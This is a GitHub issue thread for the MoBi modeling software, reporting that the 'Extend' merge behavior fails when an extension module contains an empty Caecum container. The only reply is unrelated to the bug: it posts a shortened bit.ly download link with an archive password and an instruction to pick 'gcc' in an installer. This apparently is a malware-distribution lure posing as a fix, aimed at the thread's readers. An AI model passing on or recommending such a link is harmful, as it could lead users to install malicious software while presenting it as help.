### ISSUE TITLE
"Extend" does not work any more

### ISSUE THREAD

**Issue by PavelBal** [Open-Systems-Pharmacology/MoBi#1516]
[extend-doesnt-work.zip](https://github.com/user-attachments/files/16766228/extend-doesnt-work.zip)

In the attached project, there is a PK-Sim module and an extension module with the merge behavior "Extend".

The extension module has a container "Organism|Lumen|Caecum" without anything defined - no tags, no parameters, nothing.

When trying to create a simulation with the combination of these two modules, many parameters cannot be found and the simulation cannot be created.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
